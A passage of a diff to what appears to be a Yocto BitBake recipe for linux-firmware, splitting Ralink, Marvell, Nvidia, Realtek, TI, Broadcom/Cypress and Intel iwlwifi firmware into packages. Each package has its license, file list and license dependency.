+FILES_${PN}-ralink = " \ + ${nonarch_base_libdir}/firmware/rt*.bin \ +" + +RDEPENDS_${PN}-ralink += "${PN}-ralink-license" + +# For mediatek MT7601U +LICENSE_${PN}-mt7601u = "Firmware-ralink_a_mediatek_company_firmware" +LICENSE_${PN}-mt7601u-license = "Firmware-ralink_a_mediatek_company_firmware" + +FILES_${PN}-mt7601u-license = "${nonarch_base_libdir}/firmware/LICENCE.ralink_a_mediatek_company_firmware" +FILES_${PN}-mt7601u = " \ + ${nonarch_base_libdir}/firmware/mt7601u.bin \ +" + +RDEPENDS_${PN}-mt7601u += "${PN}-mt7601u-license" + +# For radeon +LICENSE_${PN}-radeon = "Firmware-radeon" +LICENSE_${PN}-radeon-license = "Firmware-radeon" + +FILES_${PN}-radeon-license = "${nonarch_base_libdir}/firmware/LICENSE.radeon" +FILES_${PN}-radeon = " \ + ${nonarch_base_libdir}/firmware/radeon \ +" + +RDEPENDS_${PN}-radeon += "${PN}-radeon-license" + +# For lontium +LICENSE_${PN}-lt9611uxc = "Firmware-Lontium" + +FILES_${PN}-lontium-license = "${nonarch_base_libdir}/firmware/LICENSE.Lontium" +FILES_${PN}-lt9611uxc = "${nonarch_base_libdir}/firmware/lt9611uxc_fw.bin" + +# For marvell +LICENSE_${PN}-pcie8897 = "Firmware-Marvell" +LICENSE_${PN}-pcie8997 = "Firmware-Marvell" +LICENSE_${PN}-sd8686 = "Firmware-Marvell" +LICENSE_${PN}-sd8688 = "Firmware-Marvell" +LICENSE_${PN}-sd8787 = "Firmware-Marvell" +LICENSE_${PN}-sd8797 = "Firmware-Marvell" +LICENSE_${PN}-sd8801 = "Firmware-Marvell" +LICENSE_${PN}-sd8887 = "Firmware-Marvell" +LICENSE_${PN}-sd8897 = "Firmware-Marvell" +LICENSE_${PN}-sd8997 = "Firmware-Marvell" +LICENSE_${PN}-usb8997 = "Firmware-Marvell" +LICENSE_${PN}-marvell-license = "Firmware-Marvell" + +FILES_${PN}-marvell-license = "${nonarch_base_libdir}/firmware/LICENCE.Marvell" +FILES_${PN}-pcie8897 = " \ + ${nonarch_base_libdir}/firmware/mrvl/pcie8897_uapsta.bin \ +" +FILES_${PN}-pcie8997 = " \ + ${nonarch_base_libdir}/firmware/mrvl/pcie8997_wlan_v4.bin \ + ${nonarch_base_libdir}/firmware/mrvl/pcieuart8997_combo_v4.bin \ + ${nonarch_base_libdir}/firmware/mrvl/pcieusb8997_combo_v4.bin \ +" +FILES_${PN}-sd8686 = " \ + ${nonarch_base_libdir}/firmware/libertas/sd8686_v9* \ + ${nonarch_base_libdir}/firmware/sd8686* \ +" +FILES_${PN}-sd8688 = " \ + ${nonarch_base_libdir}/firmware/libertas/sd8688* \ + ${nonarch_base_libdir}/firmware/mrvl/sd8688* \ +" +FILES_${PN}-sd8787 = " \ + ${nonarch_base_libdir}/firmware/mrvl/sd8787_uapsta.bin \ +" +FILES_${PN}-sd8797 = " \ + ${nonarch_base_libdir}/firmware/mrvl/sd8797_uapsta.bin \ +" +FILES_${PN}-sd8801 = " \ + ${nonarch_base_libdir}/firmware/mrvl/sd8801_uapsta.bin \ +" +FILES_${PN}-sd8887 = " \ + ${nonarch_base_libdir}/firmware/mrvl/sd8887_uapsta.bin \ +" +FILES_${PN}-sd8897 = " \ + ${nonarch_base_libdir}/firmware/mrvl/sd8897_uapsta.bin \ +" +do_install_append() { + # The kernel 5.6.x driver still uses the old name, provide a symlink for + # older kernels + ln -fs sdsd8997_combo_v4.bin ${D}${nonarch_base_libdir}/firmware/mrvl/sd8997_uapsta.bin +} +FILES_${PN}-sd8997 = " \ + ${nonarch_base_libdir}/firmware/mrvl/sd8997_uapsta.bin \ + ${nonarch_base_libdir}/firmware/mrvl/sdsd8997_combo_v4.bin \ +" +FILES_${PN}-usb8997 = " \ + ${nonarch_base_libdir}/firmware/mrvl/usbusb8997_combo_v4.bin \ +" + +RDEPENDS_${PN}-sd8686 += "${PN}-marvell-license" +RDEPENDS_${PN}-sd8688 += "${PN}-marvell-license" +RDEPENDS_${PN}-sd8787 += "${PN}-marvell-license" +RDEPENDS_${PN}-sd8797 += "${PN}-marvell-license" +RDEPENDS_${PN}-sd8801 += "${PN}-marvell-license" +RDEPENDS_${PN}-sd8887 += "${PN}-marvell-license" +RDEPENDS_${PN}-sd8897 += "${PN}-marvell-license" +RDEPENDS_${PN}-sd8997 += "${PN}-marvell-license" +RDEPENDS_${PN}-usb8997 += "${PN}-marvell-license" + +# For netronome +LICENSE_${PN}-netronome = "Firmware-netronome" + +FILES_${PN}-netronome-license = " \ + ${nonarch_base_libdir}/firmware/LICENCE.Netronome \ +" +FILES_${PN}-netronome = " \ + ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0081*.nffw \ + ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0096*.nffw \ + ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0097*.nffw \ + ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0099*.nffw \ + ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0058-0011_2x40.nffw \ + ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0058-0012_2x40.nffw \ + ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0078-0011_1x100.nffw \ + ${nonarch_base_libdir}/firmware/netronome/bpf \ + ${nonarch_base_libdir}/firmware/netronome/flower \ + ${nonarch_base_libdir}/firmware/netronome/nic \ + ${nonarch_base_libdir}/firmware/netronome/nic-sriov \ +" + +RDEPENDS_${PN}-netronome += "${PN}-netronome-license" + +# For Nvidia +LICENSE_${PN}-nvidia-gpu = "Firmware-nvidia" +LICENSE_${PN}-nvidia-tegra = "Firmware-nvidia" +LICENSE_${PN}-nvidia-tegra-k1 = "Firmware-nvidia" +LICENSE_${PN}-nvidia-license = "Firmware-nvidia" + +FILES_${PN}-nvidia-gpu = "${nonarch_base_libdir}/firmware/nvidia" +FILES_${PN}-nvidia-tegra = " \ + ${nonarch_base_libdir}/firmware/nvidia/tegra* \ + ${nonarch_base_libdir}/firmware/nvidia/gm20b \ + ${nonarch_base_libdir}/firmware/nvidia/gp10b \ +" +FILES_${PN}-nvidia-tegra-k1 = " \ + ${nonarch_base_libdir}/firmware/nvidia/tegra124 \ + ${nonarch_base_libdir}/firmware/nvidia/gk20a \ +" +FILES_${PN}-nvidia-license = "${nonarch_base_libdir}/firmware/LICENCE.nvidia" + +RDEPENDS_${PN}-nvidia-gpu += "${PN}-nvidia-license" +RDEPENDS_${PN}-nvidia-tegra += "${PN}-nvidia-license" +RDEPENDS_${PN}-nvidia-tegra-k1 += "${PN}-nvidia-license" + +# For RSI RS911x WiFi +LICENSE_${PN}-rs9113 = "WHENCE" +LICENSE_${PN}-rs9116 = "WHENCE" + +FILES_${PN}-rs9113 = " ${nonarch_base_libdir}/firmware/rsi/rs9113*.rps " +FILES_${PN}-rs9116 = " ${nonarch_base_libdir}/firmware/rsi/rs9116*.rps " + +RDEPENDS_${PN}-rs9113 += "${PN}-whence-license" +RDEPENDS_${PN}-rs9116 += "${PN}-whence-license" + +# For rtl +LICENSE_${PN}-rtl8188 = "Firmware-rtlwifi_firmware" +LICENSE_${PN}-rtl8192cu = "Firmware-rtlwifi_firmware" +LICENSE_${PN}-rtl8192ce = "Firmware-rtlwifi_firmware" +LICENSE_${PN}-rtl8192su = "Firmware-rtlwifi_firmware" +LICENSE_${PN}-rtl8723 = "Firmware-rtlwifi_firmware" +LICENSE_${PN}-rtl8821 = "Firmware-rtlwifi_firmware" +LICENSE_${PN}-rtl-license = "Firmware-rtlwifi_firmware" +LICENSE_${PN}-rtl8168 = "WHENCE" + +FILES_${PN}-rtl-license = " \ + ${nonarch_base_libdir}/firmware/LICENCE.rtlwifi_firmware.txt \ +" +FILES_${PN}-rtl8188 = " \ + ${nonarch_base_libdir}/firmware/rtlwifi/rtl8188*.bin \ +" +FILES_${PN}-rtl8192cu = " \ + ${nonarch_base_libdir}/firmware/rtlwifi/rtl8192cufw*.bin \ +" +FILES_${PN}-rtl8192ce = " \ + ${nonarch_base_libdir}/firmware/rtlwifi/rtl8192cfw*.bin \ +" +FILES_${PN}-rtl8192su = " \ + ${nonarch_base_libdir}/firmware/rtlwifi/rtl8712u.bin \ +" +FILES_${PN}-rtl8723 = " \ + ${nonarch_base_libdir}/firmware/rtlwifi/rtl8723*.bin \ +" +FILES_${PN}-rtl8821 = " \ + ${nonarch_base_libdir}/firmware/rtlwifi/rtl8821*.bin \ +" +FILES_${PN}-rtl8168 = " \ + ${nonarch_base_libdir}/firmware/rtl_nic/rtl8168*.fw \ +" + +RDEPENDS_${PN}-rtl8188 += "${PN}-rtl-license" +RDEPENDS_${PN}-rtl8192ce += "${PN}-rtl-license" +RDEPENDS_${PN}-rtl8192cu += "${PN}-rtl-license" +RDEPENDS_${PN}-rtl8192su = "${PN}-rtl-license" +RDEPENDS_${PN}-rtl8723 += "${PN}-rtl-license" +RDEPENDS_${PN}-rtl8821 += "${PN}-rtl-license" +RDEPENDS_${PN}-rtl8168 += "${PN}-whence-license" + +# For ti-connectivity +LICENSE_${PN}-wlcommon = "Firmware-ti-connectivity" +LICENSE_${PN}-wl12xx = "Firmware-ti-connectivity" +LICENSE_${PN}-wl18xx = "Firmware-ti-connectivity" +LICENSE_${PN}-ti-connectivity-license = "Firmware-ti-connectivity" + +FILES_${PN}-ti-connectivity-license = "${nonarch_base_libdir}/firmware/LICENCE.ti-connectivity" +# wl18xx optionally needs wl1271-nvs.bin (which itself is a symlink to +# wl127x-nvs.bin) - see linux/drivers/net/wireless/ti/wlcore/sdio.c +# and drivers/net/wireless/ti/wlcore/spi.c. +# While they're optional and actually only used to override the MAC +# address on wl18xx, driver loading will delay (by udev timout - 60s) +# if not there. So let's make it available always. Because it's a +# symlink, both need to go to wlcommon. +FILES_${PN}-wlcommon = " \ + ${nonarch_base_libdir}/firmware/ti-connectivity/TI* \ + ${nonarch_base_libdir}/firmware/ti-connectivity/wl127x-nvs.bin \ + ${nonarch_base_libdir}/firmware/ti-connectivity/wl1271-nvs.bin \ +" +FILES_${PN}-wl12xx = " \ + ${nonarch_base_libdir}/firmware/ti-connectivity/wl12* \ +" +FILES_${PN}-wl18xx = " \ + ${nonarch_base_libdir}/firmware/ti-connectivity/wl18* \ +" + +RDEPENDS_${PN}-wl12xx = "${PN}-ti-connectivity-license ${PN}-wlcommon" +RDEPENDS_${PN}-wl18xx = "${PN}-ti-connectivity-license ${PN}-wlcommon" + +# For vt6656 +LICENSE_${PN}-vt6656 = "Firmware-via_vt6656" +LICENSE_${PN}-vt6656-license = "Firmware-via_vt6656" + +FILES_${PN}-vt6656-license = "${nonarch_base_libdir}/firmware/LICENCE.via_vt6656" +FILES_${PN}-vt6656 = " \ + ${nonarch_base_libdir}/firmware/vntwusb.fw \ +" + +RDEPENDS_${PN}-vt6656 = "${PN}-vt6656-license" + +# For broadcom + +# for i in `grep brcm WHENCE | grep ^File | sed 's/File: brcm.//g'`; do pkg=`echo $i | sed 's/-[sp40].*//g; s/\.bin//g; s/brcmfmac/bcm/g; s/_hdr/-hdr/g; s/BCM/bcm-0bb4-0306/g'`; echo -e " \${PN}-$pkg \\"; done | sort -u + +LICENSE_${PN}-broadcom-license = "Firmware-broadcom_bcm43xx" +FILES_${PN}-broadcom-license = "${nonarch_base_libdir}/firmware/LICENCE.broadcom_bcm43xx" + +# for i in `grep brcm WHENCE | grep ^File | sed 's/File: brcm.//g'`; do pkg=`echo $i | sed 's/-[sp40].*//g; s/\.bin//g; s/brcmfmac/bcm/g; s/_hdr/-hdr/g; s/BCM/bcm-0bb4-0306/g'`; echo "$i - $pkg"; echo -e "FILES_\${PN}-$pkg = \"\${nonarch_base_libdir}/firmware/brcm/$i\""; done | grep ^FILES + +FILES_${PN}-bcm43xx = "${nonarch_base_libdir}/firmware/brcm/bcm43xx-0.fw" +FILES_${PN}-bcm43xx-hdr = "${nonarch_base_libdir}/firmware/brcm/bcm43xx_hdr-0.fw" +FILES_${PN}-bcm4329-fullmac = "${nonarch_base_libdir}/firmware/brcm/bcm4329-fullmac-4.bin" +FILES_${PN}-bcm43236b = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43236b.bin" +FILES_${PN}-bcm4329 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4329-sdio.bin" +FILES_${PN}-bcm4330 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4330-sdio.*" +FILES_${PN}-bcm4334 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4334-sdio.bin" +FILES_${PN}-bcm4335 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4335-sdio.bin" +FILES_${PN}-bcm4339 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4339-sdio.bin \ + ${nonarch_base_libdir}/firmware/cypress/cyfmac4339-sdio.bin \ +" +FILES_${PN}-bcm43241b0 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43241b0-sdio.bin" +FILES_${PN}-bcm43241b4 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43241b4-sdio.bin" +FILES_${PN}-bcm43241b5 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43241b5-sdio.bin" +FILES_${PN}-bcm43242a = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43242a.bin" +FILES_${PN}-bcm43143 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43143.bin \ + ${nonarch_base_libdir}/firmware/brcm/brcmfmac43143-sdio.bin \ +" +FILES_${PN}-bcm43430a0 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43430a0-sdio.*" +FILES_${PN}-bcm43455 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43455-sdio.* \ + ${nonarch_base_libdir}/firmware/cypress/cyfmac43455-sdio.* \ +" +FILES_${PN}-bcm4350c2 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4350c2-pcie.bin" +FILES_${PN}-bcm4350 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4350-pcie.bin" +FILES_${PN}-bcm4356 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4356-sdio.* \ + ${nonarch_base_libdir}/firmware/cypress/cyfmac4356-sdio.* \ +" +FILES_${PN}-bcm43569 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43569.bin" +FILES_${PN}-bcm43570 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43570-pcie.bin \ + ${nonarch_base_libdir}/firmware/cypress/cyfmac43570-pcie.bin \ +" +FILES_${PN}-bcm4358 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4358-pcie.bin" +FILES_${PN}-bcm43602 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43602-pcie.bin \ + ${nonarch_base_libdir}/firmware/brcm/brcmfmac43602-pcie.ap.bin \ +" +FILES_${PN}-bcm4366b = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4366b-pcie.bin" +FILES_${PN}-bcm4366c = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4366c-pcie.bin" +FILES_${PN}-bcm4371 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4371-pcie.bin" + +# for i in `grep brcm WHENCE | grep ^File | sed 's/File: brcm.//g'`; do pkg=`echo $i | sed 's/-[sp40].*//g; s/\.bin//g; s/brcmfmac/bcm/g; s/_hdr/-hdr/g; s/BCM/bcm-0bb4-0306/g'`; echo -e "LICENSE_\${PN}-$pkg = \"Firmware-broadcom_bcm43xx\"\nRDEPENDS_\${PN}-$pkg += \"\${PN}-broadcom-license\""; done +# Currently 1st one and last 6 have cypress LICENSE + +LICENSE_${PN}-bcm43xx = "Firmware-broadcom_bcm43xx" +RDEPENDS_${PN}-bcm43xx += "${PN}-broadcom-license" +LICENSE_${PN}-bcm43xx-hdr = "Firmware-broadcom_bcm43xx" +RDEPENDS_${PN}-bcm43xx-hdr += "${PN}-broadcom-license" +LICENSE_${PN}-bcm4329-fullmac = "Firmware-broadcom_bcm43xx" +RDEPENDS_${PN}-bcm4329-fullmac += "${PN}-broadcom-license" +LICENSE_${PN}-bcm43236b = "Firmware-broadcom_bcm43xx" +RDEPENDS_${PN}-bcm43236b += "${PN}-broadcom-license" +LICENSE_${PN}-bcm4329 = "Firmware-broadcom_bcm43xx" +RDEPENDS_${PN}-bcm4329 += "${PN}-broadcom-license" +LICENSE_${PN}-bcm4330 = "Firmware-broadcom_bcm43xx" +RDEPENDS_${PN}-bcm4330 += "${PN}-broadcom-license" +LICENSE_${PN}-bcm4334 = "Firmware-broadcom_bcm43xx" +RDEPENDS_${PN}-bcm4334 += "${PN}-broadcom-license" +LICENSE_${PN}-bcm4335 = "Firmware-broadcom_bcm43xx" +RDEPENDS_${PN}-bcm4335 += "${PN}-broadcom-license" +LICENSE_${PN}-bcm4339 = "Firmware-broadcom_bcm43xx" +RDEPENDS_${PN}-bcm4339 += "${PN}-broadcom-license" +LICENSE_${PN}-bcm43241b0 = "Firmware-broadcom_bcm43xx" +RDEPENDS_${PN}-bcm43241b0 += "${PN}-broadcom-license" +LICENSE_${PN}-bcm43241b4 = "Firmware-broadcom_bcm43xx" +RDEPENDS_${PN}-bcm43241b4 += "${PN}-broadcom-license" +LICENSE_${PN}-bcm43241b5 = "Firmware-broadcom_bcm43xx" +RDEPENDS_${PN}-bcm43241b5 += "${PN}-broadcom-license" +LICENSE_${PN}-bcm43242a = "Firmware-broadcom_bcm43xx" +RDEPENDS_${PN}-bcm43242a += "${PN}-broadcom-license" +LICENSE_${PN}-bcm43143 = "Firmware-broadcom_bcm43xx" +RDEPENDS_${PN}-bcm43143 += "${PN}-broadcom-license" +LICENSE_${PN}-bcm43430a0 = "Firmware-broadcom_bcm43xx" +RDEPENDS_${PN}-bcm43430a0 += "${PN}-broadcom-license" +LICENSE_${PN}-bcm43455 = "Firmware-broadcom_bcm43xx" +RDEPENDS_${PN}-bcm43455 += "${PN}-broadcom-license" +LICENSE_${PN}-bcm4350c2 = "Firmware-broadcom_bcm43xx" +RDEPENDS_${PN}-bcm4350c2 += "${PN}-broadcom-license" +LICENSE_${PN}-bcm4350 = "Firmware-broadcom_bcm43xx" +RDEPENDS_${PN}-bcm4350 += "${PN}-broadcom-license" +LICENSE_${PN}-bcm4356 = "Firmware-broadcom_bcm43xx" +RDEPENDS_${PN}-bcm4356 += "${PN}-broadcom-license" +LICENSE_${PN}-bcm43569 = "Firmware-broadcom_bcm43xx" +RDEPENDS_${PN}-bcm43569 += "${PN}-broadcom-license" +LICENSE_${PN}-bcm43570 = "Firmware-broadcom_bcm43xx" +RDEPENDS_${PN}-bcm43570 += "${PN}-broadcom-license" +LICENSE_${PN}-bcm4358 = "Firmware-broadcom_bcm43xx" +RDEPENDS_${PN}-bcm4358 += "${PN}-broadcom-license" +LICENSE_${PN}-bcm43602 = "Firmware-broadcom_bcm43xx" +RDEPENDS_${PN}-bcm43602 += "${PN}-broadcom-license" +LICENSE_${PN}-bcm4366b = "Firmware-broadcom_bcm43xx" +RDEPENDS_${PN}-bcm4366b += "${PN}-broadcom-license" +LICENSE_${PN}-bcm4366c = "Firmware-broadcom_bcm43xx" +RDEPENDS_${PN}-bcm4366c += "${PN}-broadcom-license" +LICENSE_${PN}-bcm4371 = "Firmware-broadcom_bcm43xx" +RDEPENDS_${PN}-bcm4371 += "${PN}-broadcom-license" + +# For broadcom cypress + +LICENSE_${PN}-cypress-license = "Firmware-cypress" +FILES_${PN}-cypress-license = "${nonarch_base_libdir}/firmware/LICENCE.cypress" + +FILES_${PN}-bcm-0bb4-0306 = "${nonarch_base_libdir}/firmware/brcm/BCM-0bb4-0306.hcd" +FILES_${PN}-bcm43340 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43340-sdio.* \ + ${nonarch_base_libdir}/firmware/cypress/cyfmac43340-sdio.*" +FILES_${PN}-bcm43362 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43362-sdio.* \ + ${nonarch_base_libdir}/firmware/cypress/cyfmac43362-sdio.*" +FILES_${PN}-bcm43430 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43430-sdio.* \ + ${nonarch_base_libdir}/firmware/cypress/cyfmac43430-sdio.*" +FILES_${PN}-bcm4354 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4354-sdio.bin \ + ${nonarch_base_libdir}/firmware/cypress/cyfmac4354-sdio.bin \ +" +FILES_${PN}-bcm4356-pcie = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4356-pcie.* \ + ${nonarch_base_libdir}/firmware/cypress/cyfmac4356-pcie.* \ +" +FILES_${PN}-bcm4373 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4373-sdio.bin \ + ${nonarch_base_libdir}/firmware/brcm/brcmfmac4373.bin \ + ${nonarch_base_libdir}/firmware/cypress/cyfmac4373-sdio.bin \ +" + +LICENSE_${PN}-bcm-0bb4-0306 = "Firmware-cypress" +RDEPENDS_${PN}-bcm-0bb4-0306 += "${PN}-cypress-license" +LICENSE_${PN}-bcm43340 = "Firmware-cypress" +RDEPENDS_${PN}-bcm43340 += "${PN}-cypress-license" +LICENSE_${PN}-bcm43362 = "Firmware-cypress" +RDEPENDS_${PN}-bcm43362 += "${PN}-cypress-license" +LICENSE_${PN}-bcm43430 = "Firmware-cypress" +RDEPENDS_${PN}-bcm43430 += "${PN}-cypress-license" +LICENSE_${PN}-bcm4354 = "Firmware-cypress" +RDEPENDS_${PN}-bcm4354 += "${PN}-cypress-license" +LICENSE_${PN}-bcm4356-pcie = "Firmware-cypress" +RDEPENDS_${PN}-bcm4356-pcie += "${PN}-cypress-license" +LICENSE_${PN}-bcm4373 = "Firmware-cypress" +RDEPENDS_${PN}-bcm4373 += "${PN}-cypress-license" + +# For Broadcom bnx2-mips +# +# which is a separate case to the other Broadcom firmwares since its +# license is contained in the shared WHENCE file. + +LICENSE_${PN}-bnx2-mips = "WHENCE" +LICENSE_${PN}-whence-license = "WHENCE" + +FILES_${PN}-bnx2-mips = "${nonarch_base_libdir}/firmware/bnx2/bnx2-mips-09-6.2.1b.fw" +FILES_${PN}-whence-license = "${nonarch_base_libdir}/firmware/WHENCE" + +RDEPENDS_${PN}-bnx2-mips += "${PN}-whence-license" + +# For imx-sdma +LICENSE_${PN}-imx-sdma-imx6q = "Firmware-imx-sdma_firmware" +LICENSE_${PN}-imx-sdma-imx7d = "Firmware-imx-sdma_firmware" +LICENSE_${PN}-imx-sdma-license = "Firmware-imx-sdma_firmware" + +FILES_${PN}-imx-sdma-imx6q = "${nonarch_base_libdir}/firmware/imx/sdma/sdma-imx6q.bin" + +RPROVIDES_${PN}-imx-sdma-imx6q = "firmware-imx-sdma-imx6q" +RREPLACES_${PN}-imx-sdma-imx6q = "firmware-imx-sdma-imx6q" +RCONFLICTS_${PN}-imx-sdma-imx6q = "firmware-imx-sdma-imx6q" + +FILES_${PN}-imx-sdma-imx7d = "${nonarch_base_libdir}/firmware/imx/sdma/sdma-imx7d.bin" + +FILES_${PN}-imx-sdma-license = "${nonarch_base_libdir}/firmware/LICENSE.sdma_firmware" + +RDEPENDS_${PN}-imx-sdma-imx6q += "${PN}-imx-sdma-license" +RDEPENDS_${PN}-imx-sdma-imx7d += "${PN}-imx-sdma-license" + +# For iwlwifi +LICENSE_${PN}-iwlwifi = "Firmware-iwlwifi_firmware" +LICENSE_${PN}-iwlwifi-135-6 = "Firmware-iwlwifi_firmware" +LICENSE_${PN}-iwlwifi-3160-7 = "Firmware-iwlwifi_firmware" +LICENSE_${PN}-iwlwifi-3160-8 = "Firmware-iwlwifi_firmware" +LICENSE_${PN}-iwlwifi-3160-9 = "Firmware-iwlwifi_firmware" +LICENSE_${PN}-iwlwifi-3160-10 = "Firmware-iwlwifi_firmware" +LICENSE_${PN}-iwlwifi-3160-12 = "Firmware-iwlwifi_firmware" +LICENSE_${PN}-iwlwifi-3160-13 = "Firmware-iwlwifi_firmware" +LICENSE_${PN}-iwlwifi-3160-16 = "Firmware-iwlwifi_firmware" +LICENSE_${PN}-iwlwifi-3160-17 = "Firmware-iwlwifi_firmware" +LICENSE_${PN}-iwlwifi-6000-4 = "Firmware-iwlwifi_firmware" +LICENSE_${PN}-iwlwifi-6000g2a-5 = "Firmware-iwlwifi_firmware" +LICENSE_${PN}-iwlwifi-6000g2a-6 = "Firmware-iwlwifi_firmware" +LICENSE_${PN}-iwlwifi-6000g2b-5 = "Firmware-iwlwifi_firmware" +LICENSE_${PN}-iwlwifi-6000g2b-6 = "Firmware-iwlwifi_firmware" +LICENSE_${PN}-iwlwifi-6050-4 = "Firmware-iwlwifi_firmware" +LICENSE_${PN}-iwlwifi-6050-5 = "Firmware-iwlwifi_firmware" +LICENSE_${PN}-iwlwifi-7260 = "Firmware-iwlwifi_firmware" +LICENSE_${PN}-iwlwifi-7265 = "Firmware-iwlwifi_firmware" +LICENSE_${PN}-iwlwifi-7265d = "Firmware-iwlwifi_firmware" +LICENSE_${PN}-iwlwifi-8000c = "Firmware-iwlwifi_firmware" +LICENSE_${PN}-iwlwifi-8265 = "Firmware-iwlwifi_firmware" +LICENSE_${PN}-iwlwifi-9000 = "Firmware-iwlwifi_firmware" +LICENSE_${PN}-iwlwifi-misc = "Firmware-iwlwifi_firmware" +LICENSE_${PN}-iwlwifi-license = "Firmware-iwlwifi_firmware" + + +FILES_${PN}-iwlwifi-license = "${nonarch_base_libdir}/firmware/LICENCE.iwlwifi_firmware" +FILES_${PN}-iwlwifi-135-6 = "${nonarch_base_libdir}/firmware/iwlwifi-135-6.ucode" +FILES_${PN}-iwlwifi-3160-7 = "${nonarch_base_libdir}/firmware/iwlwifi-3160-7.ucode" +FILES_${PN}-iwlwifi-3160-8 = "${nonarch_base_libdir}/firmware/iwlwifi-3160-8.ucode" +FILES_${PN}-iwlwifi-3160-9 = "${nonarch_base_libdir}/firmware/iwlwifi-3160-9.ucode" +FILES_${PN}-iwlwifi-3160-10 = "${nonarch_base_libdir}/firmware/iwlwifi-3160-10.ucode" +FILES_${PN}-iwlwifi-3160-12 = "${nonarch_base_libdir}/firmware/iwlwifi-3160-12.ucode" +FILES_${PN}-iwlwifi-3160-13 = "${nonarch_base_libdir}/firmware/iwlwifi-3160-13.ucode" +FILES_${PN}-iwlwifi-3160-16 = "${nonarch_base_libdir}/firmware/iwlwifi-3160-16.ucode" +FILES_${PN}-iwlwifi-3160-17 = "${nonarch_base_libdir}/firmware/iwlwifi-3160-17.ucode" +FILES_${PN}-iwlwifi-6000-4 = "${nonarch_base_libdir}/firmware/iwlwifi-6000-4.ucode" +FILES_${PN}-iwlwifi-6000g2a-5 = "${nonarch_base_libdir}/firmware/iwlwifi-6000g2a-5.ucode" +FILES_${PN}-iwlwifi-6000g2a-6 = "${nonarch_base_libdir}/firmware/iwlwifi-6000g2a-6.ucode" +FILES_${PN}-iwlwifi-6000g2b-5 = "${nonarch_base_libdir}/firmware/iwlwifi-6000g2b-5.ucode" +FILES_${PN}-iwlwifi-6000g2b-6 = "${nonarch_base_libdir}/firmware/iwlwifi-6000g2b-6.ucode" +FILES_${PN}-iwlwifi-6050-4 = "${nonarch_base_libdir}/firmware/iwlwifi-6050-4.ucode" +FILES_${PN}-iwlwifi-6050-5 = "${nonarch_base_libdir}/firmware/iwlwifi-6050-5.ucode" +FILES_${PN}-iwlwifi-7260 = "${nonarch_base_libdir}/firmware/iwlwifi-7260-*.ucode" +FILES_${PN}-iwlwifi-7265 = "${nonarch_base_libdir}/firmware/iwlwifi-7265-*.ucode" +FILES_${PN}-iwlwifi-7265d = "${nonarch_base_libdir}/firmware/iwlwifi-7265D-*.ucode" +FILES_${PN}-iwlwifi-8000c = "${nonarch_base_libdir}/firmware/iwlwifi-8000C-*.ucode" +FILES_${PN}-iwlwifi-8265 = "${nonarch_base_libdir}/firmware/iwlwifi-8265-*.ucode" +FILES_${PN}-iwlwifi-9000 = "${nonarch_base_libdir}/firmware/iwlwifi-9000-*.ucode" +FILES_${PN}-iwlwifi-misc = "${nonarch_base_libdir}/firmware/iwlwifi-*.ucode" + +RDEPENDS_${PN}-iwlwifi-135-6 = "${PN}-iwlwifi-license" +RDEPENDS_${PN}-iwlwifi-3160-7 = "${PN}-iwlwifi-license" +RDEPENDS_${PN}-iwlwifi-3160-8 = "${PN}-iwlwifi-license" +RDEPENDS_${PN}-iwlwifi-3160-9 = "${PN}-iwlwifi-license" +RDEPENDS_${PN}-iwlwifi-3160-10 = "${PN}-iwlwifi-license" +RDEPENDS_${PN}-iwlwifi-3160-12 = "${PN}-iwlwifi-license" +RDEPENDS_${PN}-iwlwifi-3160-13 = "${PN}-iwlwifi-license" +RDEPENDS_${PN}-iwlwifi-3160-16 = "${PN}-iwlwifi-license" +RDEPENDS_${PN}-iwlwifi-3160-17 = "${PN}-iwlwifi-license" +RDEPENDS_${PN}-iwlwifi-6000-4 = "${PN}-iwlwifi-license" +RDEPENDS_${PN}-iwlwifi-6000g2a-5 = "${PN}-iwlwifi-license" +RDEPENDS_${PN}-iwlwifi-6000g2a-6 = "${PN}-iwlwifi-license" +RDEPENDS_${PN}-iwlwifi-6000g2b-5 = "${PN}-iwlwifi-license" +RDEPENDS_${PN}-iwlwifi-6000g2b-6 = "${PN}-iwlwifi-license" +RDEPENDS_${PN}-iwlwifi-6050-4 = "${PN}-iwlwifi-license" +RDEPENDS_${PN}-iwlwifi-6050-5 = "${PN}-iwlwifi-license" +RDEPENDS_${PN}-iwlwifi-7260 = "${PN}-iwlwifi-license" +RDEPENDS_${PN}-iwlwifi-7265 = "${PN}-iwlwifi-license" +RDEPENDS_${PN}-iwlwifi-7265d = "${PN}-iwlwifi-license" +RDEPENDS_${PN}-iwlwifi-8000c = "${PN}-iwlwifi-license" +RDEPENDS_${PN}-iwlwifi-8265 = 